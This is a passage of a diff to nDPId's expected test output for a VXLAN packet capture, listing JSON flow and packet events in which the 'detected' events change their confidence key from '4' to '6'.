00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1639650442711,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":154,"pkt_l4_len":116,"thread_ts_msec":1639650442711,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAiK8kAABAER3nwKgWBcCoFgSrWhK1AHSt3wgAAAAABFcAHuppKm\/PZnpQqv+aCABFAABW18oAAHgRPK8ICAgICgoUBAA1rZUAQjV7G8+BgAABAAEAAAAACGZhY2Vib29rA2NvbQAAHAABwAwAHAABAAABLAAQKgMogPFlAIH6zrAMAAAl3g=="} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442712,"flow_last_seen":1639650442712,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442712,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":49762,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1639650442712,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":128,"pkt_l4_len":90,"thread_ts_msec":1639650442712,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAbgNKAABAEcnbwKgWBMCoFgXCYhK1AFoDcQgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA8c1FAAEAGK0kKChQEnfDgI7CqAbtGa9PfAAAAAKAC\/Vy6qgAAAgQFggQCCAr1DDJLAAAAAAEDAwc="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442712,"flow_last_seen":1639650442712,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442712,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":49762,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442712,"flow_last_seen":1639650442712,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442712,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":49762,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442720,"flow_last_seen":1639650442720,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442720,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":60230,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1639650442720,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":128,"pkt_l4_len":90,"thread_ts_msec":1639650442720,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAbq8mAABAER3\/wKgWBcCoFgTrRhK1AFqtxQgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAA8AABAAFcGh5Kd8OAjCgoUBAG7sKrMyr8yRmvT4KAS\/\/+p5QAAAgQFcAQCCApu3xNF9QwySwEDAwg="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442720,"flow_last_seen":1639650442720,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442720,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":60230,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442720,"flow_last_seen":1639650442720,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442720,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":60230,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1639650442721,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":120,"pkt_l4_len":82,"thread_ts_msec":1639650442721,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAZgNLAABAEcniwKgWBMCoFgXCYhK1AFIDeQgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA0c1JAAEAGK1AKChQEnfDgI7CqAbtGa9PgzMq\/M4AQAfvWagAAAQEICvUMMlRu3xNF"} 00958{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1639650442721,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":434,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":434,"pkt_l4_len":396,"thread_ts_msec":1639650442721,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQABoANMAABAEcinwKgWBMCoFgXCYhK1AYwCPwgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAFuc1NAAEAGKhUKChQEnfDgI7CqAbtGa9PgzMq\/M4AYAfsRCQAAAQEICvUMMlRu3xNFFgMBATUBAAExAwPcWPn0A3m1eWVQI6wIeeeCbwEERXHekpXL79ewykXCYSB1jrx0W5zbrxLwk6GsjZfhJPYVrgSw3Zq6NCEkFAT06gA+EwITAxMBwCzAMACfzKnMqMyqwCvALwCewCTAKABrwCPAJwBnwArAFAA5wAnAEwAzAJ0AnAA9ADwANQAvAP8BAACqAAAAEQAPAAAMZmFjZWJvb2suY29tAAsABAMAAQIACgAMAAoAHQAXAB4AGQAYACMAAAAWAAAAFwAAAA0AMAAuBAMFAwYDCAcICAgJCAoICwgECAUIBgQBBQEGAQMDAgMDAQIBAwICAgQCBQIGAgArAAkIAwQDAwMCAwEALQACAQEAMwAmACQAHQAgvh2mgzmX9e9ai9f7D2sZdwM6XcPIdlu9U72vXq+2WUY="} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1639650442730,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":120,"pkt_l4_len":82,"thread_ts_msec":1639650442730,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAZq8oAABAER4FwKgWBcCoFgTrRhK1AFKtvQgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAA0NXJAAFcGUiid8OAjCgoUBAG7sKrMyr8zRmvVGoAQAQXWHAAAAQEICm7fE0\/1DDJU"} 02407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1639650442731,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1500,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1500,"pkt_l4_len":1462,"thread_ts_msec":1639650442731,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAFyq8pAABAERigwKgWBcCoFgTrRhK1BbazIQgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAWYNXNAAFcGTMOd8OAjCgoUBAG7sKrMyr8zRmvVGoAQAQV3jwAAAQEICm7fE0\/1DDJUFgMDAHoCAAB2AwOmSfmdNeNm8QDTG24pPSbwgaHpKWVOEuxV0VdDoIbVRCB1jrx0W5zbrxLwk6GsjZfhJPYVrgSw3Zq6NCEkFAT06hMDAAAuACsAAgMEADMAJAAdACBeWCJdN6DYiyNoL9O4psA+bOwF3dlPVj+\/ZvCptenEWhQDAwABARcDAwP5x3wWkfPx0kKF78QldsrrAx9RhC9Bn0NSGlsi9mLXhXMxtjC1tRafSYFhQiJT+Fexnm8My4gs26aQEytaTPmgh5bUcw2QSfIZvydw4\/xZva+hLS\/8KA8IimnKia46hp3fWd34D\/kZeUEi4PChEE1dsSEooXjU12XznCQysKGXu4bNl\/M85AYOBz9YkdnIBAFMjv3LwRfyKzi+n+FzF2x2zQZe5zhiQO++hcg2a8zSiSl8WG4UQlAbxtYUcRtsHiuPhWa\/PFDmcr\/s5mD\/Q55l8WWg9PfvSz5AAtjdU+LwfzbipKrnitGs76ROINneUubu+vg3oG1HDHdCmIEKeQwpdQlOkFMa7Zj9p\/hnuj8kufGBHQWOnvQ4ESu9jqNCVadRhiLORyEnSmIOTVXq2PFZieMvXd\/iPGqx2LJGD35zc9E73bB1G1gUSAjqKKkF7Ka0QSqC60GRLch93kQOqKrg3ohzvWu6Nvcf1bKMMkwp3RH43UImPPvzJfBg0eF8coKNcZUeUHlo354awjbPVkVZdhktOsK2GP0UxCJQkEEIHy30I1R0Mi0YUyrXiupVR5oc885KczFIY6ZLchLSI9gBm4CPo74pczykPl0D2ohno9XIYd917oz\/CK6iDlxcZRoVCD9vR\/QBAVfogV5k0Bxag8nU0KkVlVrZu05e7Ga+la++aA\/ZRES1+kbfTcNkz+8wG0huQcFD9TuPucbrdbya+Lt4QerqgS6VIW4NcTKUEe7ooQN3x+GdEnHT5nA80FCh2Q8\/7Y4VrtbkIgXx1EFWygd\/V2e6bsr0FcvNp9dOQi4BilNsmBAYks4O62pQ+ID1+NsWsODEwCDgqelXXYi5V9R4vP0erUMDezq+wfpJUYzqIfZioJ\/y5HkwdUPno9YJNeESiKCDdm0vSVcq2riB8OcvQGo\/oDBJBq6nucF6sN73xA4p3ylMscy6Qt06wCWiIr6\/vtUxxidwqOW8p2ZSSzkMx7XwpulVjUmRTrg1+pvDcBMZhTG9kIWHEUpGufrn4DQ51+oLui2RUzj5RrrnkZPvUcP3Uuf14vSYq\/g7J4\/eWdbdU2KCbHvT9wEZhi+VqOcKwG4DrRCujjzD3M4n08F6YOy6Scb4ZllcNjr65M66+QJXPHl\/qHrvVforxHgyi32Tp\/UN7ndgWwvzaAOqXr7WczqRiqyo11sYjhK2i91KB3fKsvsBdhbBQICqoKnWoaqw5eT9wfklQ0THh3G6DwjYbN8EYkzO576Kr2zwXFUqs4v+YkPVQY1z03PbCmgHbLckVMef7zjCijTbA\/yVRubOrENRdj4UBJxaoYP5sU895ipoXgXM1lSoqdOIJN4We+WBWsDjj7BpFwMDBe2TZHfrkB8f5TtDXM+TM0HPoRHXGJ7oGDZRZy0uPUx3IAPv3pCX9H0HbaU\/LA95w76hakUfhlXm7Vn78btBVP3OOeAsZ62gfgCXMiiM0NNLeJLiobbCc5AckKUS9M9XcUF9gQ2jgSpnpqdmyjX9LeO5ci7XrBg6Kuj9ATfiiYj8xXQOq0KONbnADXTjSNP+mRm+X4ZdGhZQhoUs7+r9y6T3L6QaFdpvuhamDG3Y+2lgP0Oygwz31QjrgZ3kiDdVFWXvn4FweXAGyXb4\/RH2YOzcZO6qBDJPMp+Xq7rr"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442864,"flow_last_seen":1639650442864,"flow_idle_time":200000,"flow_min_l4_payload_len":84,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1639650442864,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60351,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1639650442864,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":130,"pkt_l4_len":92,"thread_ts_msec":1639650442864,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAcANpAABAEcm6wKgWBMCoFgXrvxK1AFxsGAgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA+NbtAAEAR1tYKChQECAgICIBcADUAKoq80C4BAAABAAAAAAAAA3d3dwhmYWNlYm9vawNjb20AAAEAAQ=="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442864,"flow_last_seen":1639650442864,"flow_idle_time":200000,"flow_min_l4_payload_len":84,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1639650442864,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60351,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442864,"flow_last_seen":1639650442864,"flow_idle_time":200000,"flow_min_l4_payload_len":84,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1639650442864,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60351,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1639650442864,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":130,"pkt_l4_len":92,"thread_ts_msec":1639650442864,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAcANqAABAEcm5wKgWBMCoFgXrvxK1AFxsGAgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA+NbxAAEAR1tUKChQECAgICIBcADUAKi+aKzYBAAABAAAAAAAAA3d3dwhmYWNlYm9vawNjb20AABwAAQ=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442902,"flow_last_seen":1639650442902,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1639650442902,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":50251,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1639650442902,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":175,"pkt_l4_len":137,"thread_ts_msec":1639650442902,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAna9MAABAER2qwKgWBcCoFgTESxK1AImt9AgAAAAABFcAHuppKm\/PZnpQqv+aCABFCABrklQAAHgRgggICAgICgoUBAA1gFwAV2EE0C6BgAABAAIAAAAAA3d3dwhmYWNlYm9vawNjb20AAAEAAcAMAAUAAQAAClEAEQlzdGFyLW1pbmkEYzEwcsAQwC4AAQABAAAAEQAEnfDgIw=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442902,"flow_last_seen":1639650442902,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1639650442902,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":50251,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442902,"flow_last_seen":1639650442902,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1639650442902,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":50251,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 00630{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1639650442930,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":187,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":187,"pkt_l4_len":149,"thread_ts_msec":1639650442930,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAqa9SAABAER2YwKgWBcCoFgTESxK1AJWuAAgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAB3WtIAAHgRuX4ICAgICgoUBAA1gFwAY6QKKzaBgAABAAIAAAAAA3d3dwhmYWNlYm9vawNjb20AABwAAcAMAAUAAQAACnkAEQlzdGFyLW1pbmkEYzEwcsAQwC4AHAABAAAAPAAQKgMogPFlAIH6zrAMAAAl3g=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442931,"flow_last_seen":1639650442931,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442931,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":40646,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1639650442931,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":128,"pkt_l4_len":90,"thread_ts_msec":1639650442931,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAbgNuAABAEcm3wKgWBMCoFgWexhK1AFonDQgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA8KWlAAEAGdTEKChQEnfDgI7CsAbtx7JCPAAAAAKAC\/VzRnAAAAgQFggQCCAr1DDMmAAAAAAEDAwc="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442931,"flow_last_seen":1639650442931,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442931,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":40646,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442931,"flow_last_seen":1639650442931,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442931,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":40646,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442941,"flow_last_seen":1639650442941,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442941,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":36286,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1639650442941,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":128,"pkt_l4_len":90,"thread_ts_msec":1639650442941,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAbq9VAABAER3QwKgWBcCoFgSNvhK1AFqtxQgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAA8AABAAFcGh5Kd8OAjCgoUBAG7sKwSxDYyceyQkKAS\/\/\/6FgAAAgQFcAQCCAo3WVST9QwzJgEDAwg="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442941,"flow_last_seen":1639650442941,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442941,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":36286,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442941,"flow_last_seen":1639650442941,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442941,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":36286,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1639650442941,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":120,"pkt_l4_len":82,"thread_ts_msec":1639650442941,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAZgNwAABAEcm9wKgWBMCoFgWexhK1AFInFQgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA0KWpAAEAGdTgKChQEnfDgI7CsAbtx7JCQEsQ2M4AQAfsmmgAAAQEICvUMMzE3WVST"} 00964{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1639650442942,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":438,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":438,"pkt_l4_len":400,"thread_ts_msec":1639650442942,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQABpANxAABAEch+wKgWBMCoFgWexhK1AZAl1wgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAFyKWtAAEAGc\/kKChQEnfDgI7CsAbtx7JCQEsQ2M4AYAfsFYwAAAQEICvUMMzE3WVSTFgMBATkBAAE1AwM+kikCjZKYLJ0yMsC2SkPOGgwTwgkXQ4SgJHcmBMuaciDzcy2bbZtRNimKWfvjKRYfjG8z06\/JyuimMrKvKOQk2AA+EwITAxMBwCzAMACfzKnMqMyqwCvALwCewCTAKABrwCPAJwBnwArAFAA5wAnAEwAzAJ0AnAA9ADwANQAvAP8BAACuAAAAFQATAAAQd3d3LmZhY2Vib29rLmNvbQALAAQDAAECAAoADAAKAB0AFwAeABkAGAAjAAAAFgAAABcAAAANADAALgQDBQMGAwgHCAgICQgKCAsIBAgFCAYEAQUBBgEDAwIDAwECAQMCAgIEAgUCBgIAKwAJCAMEAwMDAgMBAC0AAgEBADMAJgAkAB0AIFjRzvsXuQ0A5A179GyLQXzYsfihHOpNhs3mPbXqyp9j"} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1639650442952,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":120,"pkt_l4_len":82,"thread_ts_msec":1639650442952,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAZq9YAABAER3VwKgWBcCoFgSNvhK1AFKtvQgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAA0iYtAAFcG\/g6d8OAjCgoUBAG7sKwSxDYzceyRzoAQAQUmRwAAAQEICjdZVJ71DDMx"} 